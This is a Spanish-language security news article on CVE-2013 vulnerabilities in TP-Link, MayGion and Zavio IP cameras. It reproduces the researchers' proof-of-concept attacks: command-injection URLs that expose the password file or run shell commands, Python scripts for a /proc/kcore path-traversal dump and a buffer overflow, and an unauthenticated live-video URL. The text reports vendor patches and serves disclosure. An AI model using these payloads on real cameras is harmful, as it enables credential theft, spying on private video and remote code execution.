Múltiples vulnerabilidades en diferentes cámaras IP (TP-Link, MayGion y Zavio)

Nahuel Riva y Francisco Falcon de Core Exploit han descubierto y
publicado múltiples vulnerabilidades en cámaras IP de los fabricantes
TP-Link, MayGion y Zavio. También han desarrollado diversas pruebas de
concepto para demostrar estos fallos de seguridad.

Las vulnerabilidades que afectan a las cámaras IP TP-Link son:

* CVE-2013-2572: un atacante remoto podría utilizar los credenciales
fijados en el fichero de configuración ‘boa.conf’ para acceder a la
interfaz web de administración.

* CVE-2013-2573: un error de falta de filtrado de parámetros de entrada
en ‘/cgi-bin/mft/wireless_mft.cgi’ podría permitir la inyección de
comandos de forma remota.

Como prueba de concepto, se inyecta un comando en la siguiente URL para
alojar una copia del fichero que almacena los credenciales de los
usuarios en el directorio raíz del servidor web, aprovechando la
vulnerabilidad CVE-2013-2573:

http://DIRECCIÓN_IP/cgi-bin/mft/wireless_mft?ap=travesti;cp%20/var/www/secret.passwd%20/web/html/credenciales

quedando accesible desde la URL: http://DIRECCIÓN_IP/credenciales

Se ven afectados los dispositivos con firmware v1.6.18P12, y se han
comprobado los modelos:
* TL-SC 3130 (solo la vulnerabilidad CVE-2013-2572 afecta a este
dispositivo)
* TL-SC 3130G
* TL-SC 3171G
* TL-SC 4171G

TP-Link ha publicado una actualización de firmware que corrige los
errores en su página web.

Por su parte las cámaras IP del fabricante MayGion presentan otras dos
vulnerabilidades:

* CVE-2013-1604: un atacante remoto no autenticado podría aprovechar un
problema de ruta transversal para realizar un volcado de la memoria del
dispositivo y obtener credenciales válidas de usuario.

* CVE-2013-1605: un fallo de desbordamiento de memoria podría permitir
la ejecución de código arbitrario de forma remota.

Los investigadores han publicado dos sencillas PoC escritas en python
para probar estos dos fallos:

* Para obtener un volcado de la memoria del dispositivo (CVE-2013-1604).

import httplib
conn = httplib.HTTPConnection(“DIRECCIÓN_IP”)
conn.request(“GET”, “/../../../../../../../../../proc/kcore”)
resp = conn.getresponse()
data = resp.read()
conn.close()

* Para causar un desbordamiento de memoria y conseguir que el registro
‘Instruction Pointer’ sea sobrescrito con el valor 0x61616161
(CVE-2013-1605).

import httplib
conn = httplib.HTTPConnection(“DIRECCIÓN_IP”)
conn.request(“GET”, “/” + “A” * 3000 + “.html”)
resp = conn.getresponse()
data = resp.read()
conn.close()

Las vulnerabilidades han sido comprobadas en dispositivos con firmware
v09.27 ó 2011.27.09, aunque otras versiones también podrían verse
afectadas.

La respuesta del fabricante es que las vulnerabilidades han sido
corregidas en el firmware 2013.22.04.

Por último, los dispositivos del fabricante Zavio basados en el firmware
v1.6.03 se ven afectados por las cuatro vulnerabilidades siguientes:

* CVE-2013-2567: un atacante remoto podría utilizar los credenciales
fijados en el fichero de configuración ‘boa.conf’ para acceder a la
interfaz web de administración.

* CVE-2013-2568: un error de falta de comprobación de parámetros de
entrada en ‘/cgi-bin/mft/wireless_mft.cgi’ podría permitir la inyección
de comandos de forma remota.

* CVE-2013-2569: un atacante remoto no autenticado podía tener acceso al
vídeo en tiempo real.

* CVE-2013-2570: una inyección de comandos en la función ‘sub_C8C8’
localizada en /opt/cgi/view/param.

La PoC de los dispositivos TP-Link es aplicable a la vulnerabilidad
CVE-2013-2568.

Además, con la siguiente URL un atacante remoto no autenticado podía
tener acceso al flujo de vídeo en directo (CVE-2013-2569):

rtsp://DIRECCIÓN_IP/video.h264

La última PoC es una inyección de comandos (CVE-2013-2570) a través del
parámetro General.Time.NTP.Server que permite obtener una lista completa
de puntos de acceso ejecutando el comando ‘/sbin/awpriv ra0
get_site_survey’:

top.Type=date&General.Time.DayLightSaving.Start.Month=01&General.Time.DayLightSaving.Stop.Month=01&General.Time.DayLightSaving.Start.Week=1&General.Time.DayLightSaving.Stop.Week=1&General.Time.DayLightSaving.Start.Day=01&General.Time.DayLightSaving.Stop.Day=01&General.Time.DayLightSaving.Start.Date=01&General.Time.DayLightSaving.Stop.Date=01&General.Time.DayLightSaving.Start.Hour=00&General.Time.DayLightSaving.Stop.Hour=00&General.Time.DayLightSaving.Start.Min=00&General.Time.DayLightSaving.Stop.Min=00&Image.OSD.Enabled=off”>http://DIRECCIÓN_IP/cgi-bin/admin/param?action=update&General.Time.DateFormat=ymd&General.Time.SyncSource=NTP&General.Time.TimeZone=GMT-06:00/America/Mexico_City&General.Time.NTP.ServerAuto=no&General.Time.NTP.Server=sarasa!de!palermo;/sbin/awpriv%20ra0%20get_site_survey;&General.Time.NTP.Update=01:00:00&General.Time.DayLightSaving.Enabled=on&General.Time.DayLightSaving.Start.Type=date&General.Time.DayLightSaving.Stop.Type=date&General.Time.DayLightSaving.Start.Month=01&General.Time.DayLightSaving.Stop.Month=01&General.Time.DayLightSaving.Start.Week=1&General.Time.DayLightSaving.Stop.Week=1&General.Time.DayLightSaving.Start.Day=01&General.Time.DayLightSaving.Stop.Day=01&General.Time.DayLightSaving.Start.Date=01&General.Time.DayLightSaving.Stop.Date=01&General.Time.DayLightSaving.Start.Hour=00&General.Time.DayLightSaving.Stop.Hour=00&General.Time.DayLightSaving.Start.Min=00&General.Time.DayLightSaving.Stop.Min=00&Image.OSD.Enabled=off

El fabricante Zavio no se ha pronunciado al respecto de las
vulnerabilidades que afectan a sus dispositivos.
 Fuente